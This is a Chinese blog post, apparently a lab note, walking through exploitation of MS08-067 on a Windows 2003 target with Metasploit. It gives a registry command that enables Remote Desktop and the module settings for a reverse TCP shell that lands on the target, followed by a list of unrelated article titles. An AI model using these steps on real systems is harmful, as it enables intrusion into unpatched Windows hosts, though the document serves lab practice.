渗透测试中期--漏洞复现--MS08_067
2024-08-23 12:48:37
靶机:Win2k3 10.10.10.130
攻击机:BT5 10.10.10.128
一:nmap 查看WinK3是否开放端口3389
开放3389方法:我的电脑->属性->远程
命令行方式开启3389端口(任意端口):
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat
二、攻击阶段
1、查找ms08_067漏洞模块
2、调用08_067_netapi渗透模块
3、查看此渗透模块所对应的攻击载荷
4、查看设置参数并进行设置所需要的参数
set payloads generic/shell_reverse_tcp #设置所需模块 set options #查看模块所需的设置的参数
set RHOST 10.10.10.130 #设置目标主机
set LRHOST 10.10.10.128 #设置本机
set LPORT 5000 #设置攻击机与靶机连接的端口
show targets
set target 7 #通过show targets 可以查看漏洞所支持windows版本,并设置目标主机所对应的版本序号
5、开始攻击
可以看到已经在win2k3的C盘目录下了
最新文章
- ajax加载模块实时刷新的原理
- C#如何读写和创建INI文件
- Hadoop2.0安装
- Python每日一练(1):计算文件夹内各个文章中出现次数最多的单词
- DOM遍历 - 过滤
- centos + nginx + php-fpm +mysql的简单配置
- 【HDU - 4349】Xiao Ming's Hope
- DK location not found. Define location with sdk.dir in the local.properties file or with an ANDROID_HOME
- MySQL的安装流程与入门
- Liferay开发人员培训计划
- JS的prototype和__proto__(含es6的class)
- 深究CSS中Position的属性和特性
- matlab作图 latex插图
- bzoj千题计划169:bzoj2463: [中山市选2009]谁能赢呢?
- 把MacBook里的电影导入到iPad
- PHP(十二)文件操作
- 【Oracle】Update方法
- codeforce diversity
- react : code splitting
- 微软的深度学习框架cntk ,我目前见过 安装方式最简单的一个框架,2.0之后开始支持C# 咯
热门文章
- css 01-CSS属性:字体属性和文本属性
- centos8中的MySQL卸载和安装
- WPF 中的相关样式
- SpringBoot整合任务调度框架Quartz及持久化配置
- Idea创建Maven项目时,没有自动添加Artifacts
- OpenSUSE 使用基础
- 一文讲尽门面日志slf4j和log4j、log4j2、logback依赖jar引用关系
- linux脚本错误: line *: [: missing `]',linux编写shell脚本时的注意点
- WPF APP 启动时增加特殊逻辑
- Docker-Compose练习